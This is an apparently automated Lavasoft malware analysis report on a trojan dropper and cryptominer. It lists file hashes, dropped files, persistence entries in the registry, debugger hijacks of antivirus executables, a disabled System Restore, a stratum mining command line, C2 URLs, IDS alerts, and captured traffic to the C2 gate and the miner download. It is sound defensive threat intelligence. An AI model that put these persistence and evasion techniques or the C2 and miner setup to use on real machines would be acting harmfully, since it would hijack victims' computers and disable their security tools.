Trojan.GenericKD.1604858_686d2b67d3

by malwarelabrobot on August 6th, 2014 in Malware Descriptions.

Trojan-Dropper.Win32.Dapato.dxmy (Kaspersky), Trojan.GenericKD.1604858 (B) (Emsisoft), Trojan.GenericKD.1604858 (AdAware), Trojan.MSIL.Bladabindi.2.FD, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 686d2b67d3fcf700aabd7b850461c433
SHA1: 2133dcd4fd2f78f173ee55eed79023d303499259
SHA256: 4dbfd7894859668baacd6cab60aa7bfeeee95e5618721ac18cf7ad0c1ecc69b2
SSDeep: 6144:H2 b8x d2VzAalK7d1GNU8fykJxDFkMcuDXOgfrf0i7RSn:T8Yd2d4riUyXdmMcSXOgT8C
Size: 247808 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2014-03-11 02:51:22
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

mscorsvw.exe:1912
WScript.exe:1736
%original file name%.exe:2024
%original file name%.exe:544
nt32.exe:1316

The Trojan injects its code into the following process(es):

cvtres.exe:432
nt32.exe:1560

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2024 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\NTKernel\nt32.exe (1281 bytes)

The process nt32.exe:1560 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\62B5AF9BE9ADC1085C3C56EC07A82BF6 (133 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar7F.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Documents and Settings%\All Users\Application Data\load32.vbs (873 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\60E31627FDA0A46932B0E5948949F2A5 (933 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\E8974A4669383843486E5AFDB09650F5 (224 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
%Documents and Settings%\%current user%\My Documents\315load32.exe (1281 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\C554DCF706A5AAB8B360FAD227EAB9C7 (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab7E.tmp (49 bytes)
%System%\wbem\Logs\wbemprox.log (76 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\Update.Microsoft.com.url (46 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\E8974A4669383843486E5AFDB09650F5 (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar81.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C554DCF706A5AAB8B360FAD227EAB9C7 (176 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\0797C381B2F87EB5A1D5573BD15BA4F4 (240 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\60E31627FDA0A46932B0E5948949F2A5 (164 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\0797C381B2F87EB5A1D5573BD15BA4F4 (37 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab80.tmp (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar83.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (54 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (533 bytes)
C:\NTKernel\load32 (7972 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\All Users\Application Data\load32.exe (1281 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\62B5AF9BE9ADC1085C3C56EC07A82BF6 (224 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab82.tmp (54 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Tar81.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\load32.vbs (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab7E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar7F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab82.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab80.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar83.tmp (0 bytes)

Registry activity

The process mscorsvw.exe:1912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "2340000"

The process WScript.exe:1736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C EF 75 65 9B 5D 02 77 6F 77 36 2E 02 E1 5D 91"

The process cvtres.exe:432 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 8A 01 A4 8F EA 19 E7 2B 87 62 1C 2F 30 1A 9E"

The process %original file name%.exe:2024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 BE 49 BD CF 9F 00 3C 64 E9 39 00 FF 4E EB 54"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\NTKernel]
"nt32.exe" = " Offlin e Files Mig ration Plu gin."

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process %original file name%.exe:544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D 14 30 C3 3D 2D 6E 74 00 E1 CB B6 4A 48 2B D8"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process nt32.exe:1560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bdagent.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ComboFix.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgidsagent.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamservice.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgwdsvc.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avconfig.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVP.EXE]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spybotsd.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbampt.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccuac.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastUI.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nt32.exe]
"DisableExceptionChainValidation" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamscheduler.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgui.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings]
"REG_DWORD" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgcsrvx.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamgui.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVGNT.EXE]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastSvc.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avguard.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3C FD AD DB 77 45 E4 2C 33 83 8E 90 DE A6 F0 CE"

[HKCU\Software\VB and VBA Program Settings\Microsoft\Sysinternals]
"bk" = "active"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zlclient.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrsx.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\keyscrambler.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscan.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\VB and VBA Program Settings\Microsoft\Sysinternals]
"Version" = "-a scrypt -o stratum tcp://idhash.com:3333 -O ming.5:5 -t THREADS"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows]
"load" = "C:\NTKernel\nt32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\instup.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

The following service is disabled:

[HKLM\System\CurrentControlSet\Services\Schedule]
"Start" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NT Kernel Service" = "C:\NTKernel\nt32.exe -rundll32 /SYSTEM32 C:\Windows\System32\taskmgr.exe %Program Files%\Microsoft\Windows"

The Trojan adds the reference to itself to be executed when a user logs on:

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "explorer.exe,%Documents and Settings%\All Users\Application Data\load32.exe"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe Reader Speed Launcher"

"VMware User Process"

"Adobe ARM"

"SunJavaUpdateSched"

The process nt32.exe:1316 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "15 76 B6 DF 8B 60 D0 20 30 9C 40 8E 33 8D E0 EA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description: Offlin e Files Mig ration Plu gin.
Comments:
Language: Hungarian (Hungary)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 8192 244996 245248 5.36039 f9d51a4540a1f3e42237042f4c09fa72
.rsrc 253952 1536 1536 2.33762 81eadcd472e05fbf7d37f29b23ebb0a1
.reloc 262144 12 512 0.056519 20cde55600486539501929554b1d8b93

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://dota2id.org/panel/gate.php 108.160.152.134
hxxp://dota2id.org/panel/mining/CPUMiner.files 108.160.152.134
hxxp://e6845.ce.akamaiedge.net/pca3-g2.crl
hxxp://e6845.ce.akamaiedge.net/CSC3-2009.crl
hxxp://e6845.ce.akamaiedge.net/pca3.crl
hxxp://e6845.ce.akamaiedge.net/CSC3-2009-2.crl
hxxp://csc3-2009-2-crl.verisign.com/CSC3-2009-2.crl 23.9.117.163
hxxp://crl.verisign.com/pca3.crl 23.9.117.163
hxxp://crl.verisign.com/pca3-g2.crl 23.9.117.163
hxxp://csc3-2009-crl.verisign.com/CSC3-2009.crl 23.9.117.163
idhash.com 128.199.193.246


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Trojan Generic - POST To gate.php with no referer
ET TROJAN W32.Blackshades/Shadesrat Backdoor CnC Beacon
ET POLICY W32/BitCoinMiner.MultiThreat Subscribe/Authorize Stratum Protocol Message
ET POLICY W32/BitCoinMiner.MultiThreat Stratum Protocol Mining.Notify Initial Connection Server Response

Traffic

GET /CSC3-2009.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: csc3-2009-crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "dee4c8c0f47e0b062f31548f63623031:1407186311"
Last-Modified: Mon, 04 Aug 2014 21:05:11 GMT
Date: Tue, 05 Aug 2014 02:49:38 GMT
Content-Length: 2249
Connection: keep-alive
Content-Type: application/pkix-crl
0...0......0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0
...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://VVV.v
erisign.com/rpa (c)091.0,..U...%VeriSign Class 3 Code Signing 2009 CA.
.140804210003Z..140818210003Z0...0!.....zOR.D...,oMa...090525061903Z0!
......t.o=(..(..G...090520231844Z0!... ....M...m.Q.&...090517075442Z0!
...T.Ay(..U...:_|...090608072333Z0!... .(.....F..9.....090805090059Z0!
.......P..._}..;.x..090714150126Z0!.....5=.qOV[.cyg.&..090528172131Z0!
...K...=$.6.........090521015930Z0!...-H...D...tDXUN...090527062050Z0!
.......-.'@..<B{....090525110212Z0!......x..m*[.7.h#"..090702070220
Z0!.....%.o.....kT.....090527062152Z0!..!.*;....)..Ef..k..090529084018
Z0!..#.}h..."..........090527050204Z0!..$.I^./@.:7.p.,v...090521201736
Z0!..&.5{.....Q;D......090521184343Z0!..&...T[.~y.........090903081104
Z0!...q..m...G..i^.....090521025017Z0!../a.nS..[lA.lCB....090527045238
Z0!..0.....R..iX.px....090605052910Z0!..2.h..).n......p;..090713144756
Z0!..:.............. ..090605052934Z0!..;.0.*.v..*....P...090601001940
Z0!..?..}p 2I..o.\[email protected]`......l..090527022214
Z0!..B..h~a..]..L.2....100512125735Z0!..B.U..ZF...........090527041620
Z0!..F'....?xxnx.6Q....090528003453Z0!..F|A..r....#.@.&...090527062259
Z0!..L.r....F..^..i.t..090608130549Z0!..Q...Y...Exm.._7...090520225737
Z0!..TH..~.. ..({......090723115618Z0!..U.59Z..[.G.RmyR1..090527071534
Z0!..V ].h.../".V<8-...090611075746Z0!..gHT...j5zdG....K..090521205
535Z0!..mje.......;.......090521012215Z0!..p^..E.{.>.........09
<<< skipped >>>


POST /panel/gate.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: dota2id.org
Content-Length: 194
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




crypt===gKtRWYqkDUYpieIdEM04iMgAEIgADNzcTRgACIgACIgACIgASVQNEIpIFKu9WZ
YBSKShCblRnbJpCIukUSgE0RWNFIlJXY31kVq4WatRWQqE0LOpiN4gHIQhFIzd3bk5WaXp
SYjdjZwUmZ3ATN1EGZidDNlljM3cjMmRGNxUjY5gjZxMzY5AjN5cDM

HTTP/1.1 200 OK


Date: Tue, 05 Aug 2014 02:49:29 GMT
Server: Apache
X-Powered-By: PHP/5.4.25
Content-Length: 228
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive
Content-Type: text/html
=wnKTRUQFJFSUBCdtASN6UjLn5WatByTtAyMzMzM602bj5CazFGakl2LvoDcjR3KtVHdhJ
HdzBybtACdwlncjNHIh1iKgMXZslmZuIXZulWTVB1Qvcmbp5Wat9Cbl5WYw9yZy9mLklmM
hR3bk9yL6AHd0hGI0JXY0NnLyVmbp1Gfw9Gdz5icl5WatxHcvR3cuUHcn5icl5WatxXZsJ
WYuVmLyVGbsl2a09mY....


GET /panel/mining/CPUMiner.files HTTP/1.1


Host: dota2id.org


HTTP/1.1 200 OK
Date: Tue, 05 Aug 2014 02:49:30 GMT
Server: Apache
Last-Modified: Fri, 21 Feb 2014 15:02:37 GMT
Accept-Ranges: bytes
Content-Length: 1511936
Content-Type: text/plain
......................................................................
........................S.R.E.S.U._.Y.E.K.H.........................0.
..E.N.I.H.C.A.M._.L.A.C.O.L._.Y.E.K.H.........................@...R.E.
S.U._.T.N.E.R.R.U.C._.Y.E.K.H.........................>...G.I.F.N.O
.C._.T.N.E.R.R.U.C._.Y.E.K.H.........................B...T.O.O.R._.S.E
.S.S.A.L.C._.Y.E.K.H.........................>.............2.3.m.e.
t.s.y.S.\.>.t.o.o.R.m.e.t.s.y.S.<.......2.3.m.e.t.s.y.S.......`.
..^...\...J.........................................................&g
t;.t.o.o.R.m.e.t.s.y.S.<.......>.t.o.o.R.m.e.t.s.y.S.<.......
h...f...d...J.........................................................
......................................................................
......................................................................
.....................................7.7.7.7.7.7.7.7.7.7.7.7h7d7`7\7X7
T7P7L7H7D7@7<7874707,7(7$7 7.7.7.7.7.7.7.7.6.6.6.6.6.6.6.6.6.6.6.6.
6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6|6x6t6p6l6h6d6`6\6X6T6P6L6H6D
6@6<6864606,6(6$6 6.6.6.6.6.6.5.5.5.5.5.5.5.5.5.5...........0.0.0.0
|0x0t0p0l0h0d0`0\0X0T0P0L0H0D0@0<0804000,0(0$0 0.0.0.0....H......5.
5.5.5.5.5.5.4.4.4.4.4.4.4.4.4.4.4.4.2p2l2h2d2`2\2X2T2P2L2H2D2@2<282
4202,2(2$2 2.2.2.2.2.2.2.2.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1
.1.1.1.1.1.1.1.1.1.1.1|1x1t1p1l1h1d1`1\1X1T1P1L1H1D1@1<1.1.0.0.0.0.
0.0.0.0.......p...0.040 [email protected]"
1.1.0.0.0.0.0....4..0.=A<.<.<o737.7.6.6.6.6.6i6U6F616.5.5
<<< skipped >>>


GET /pca3-g2.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "5722759b9289b36163a5ef7a94def647:1403746213"
Last-Modified: Thu, 26 Jun 2014 01:30:13 GMT
Accept-Ranges: bytes
Content-Length: 1415
Date: Tue, 05 Aug 2014 02:49:38 GMT
Connection: keep-alive
Content-Type: application/pkix-crl
0...0...0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1<0
:..U...3Class 3 Public Primary Certification Authority - G21:08..U...1
(c) 1998 VeriSign, Inc. - For authorized use only1.0...U....VeriSign T
rust Network..140617000000Z..140930235959Z0...0!...=...X.FL...3..I..08
0403173458Z0!...SJs|.."E.G.......070412172616Z0!....E........W6.n...14
0129192923Z0!.......jvO..!....]..040401180422Z0!......\*....bO-.....08
0403173459Z0!....I..:.<....9..m..070412172523Z0!.........R.E!..=t..
.070522172634Z0!....}.....}.}.(q.C..040401180606Z0!...`.6..,...u.~x.:.
.080403173459Z0!.........wX.....~...080606171636Z0!..$.Jn>.t..d_j..
."..040401180518Z0!.. ..N*(.}H..j......070412172308Z0!.. ..3.J......d.
.9..070522172711Z0!..50.h.:....s.K"....040401180542Z0!..7_f...s.......
....080403173459Z0!..<.J..y..)..~x7.e..080606171735Z0!..NS.c.f.....
.7.p...070412172213Z0!..N.k;..-...9J..-...070522172748Z0!..Q..2pRv.WC.
:..f...030109181346Z0!..Tq..m..*..........140129192925Z0!..^..CX4.3...
 F.R...070522172548Z0!..^..)..P3...7...L..080403173459Z0!..e........O.
^.S....080403173457Z0!..jP....Wv..[.v.5H..070412172102Z0!..nk.l.!y.~..
[email protected]!..r.q.I-Ln./........080403173458Z0!..t8....D....
.......080606171524Z0!..t.xn.tS....O_.....070412171951Z0!..v......Qnw.
.W.g...140129192921Z0...*.H............-.../)a)....K..^..o..(......Z.{
b<n.........d..\%.|._"~.Nm..f..[n.0.`.....7.z....G.%I.>N...T.{..
.k...G.,#.Z.v~a&.......y.....}.......
<<< skipped >>>

GET /pca3.crl HTTP/1.1


Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "6eb6550a090577f2ae45953ce2c8a47b:1403747414"
Last-Modified: Thu, 26 Jun 2014 01:50:14 GMT
Accept-Ranges: bytes
Content-Length: 933
Date: Tue, 05 Aug 2014 02:49:38 GMT
Connection: keep-alive
Content-Type: application/pkix-crl
0...0...0...*.H........0_1.0...U....US1.0...U....VeriSign, Inc.1705..U
....Class 3 Public Primary Certification Authority..140617000000Z..140
930235959Z0..x0!...v....a_>..2......020924164823Z0!.....A.....{2..Y
.#..140129175709Z0!...,.|.|...<...j ...080605174907Z0!...`y..q.....
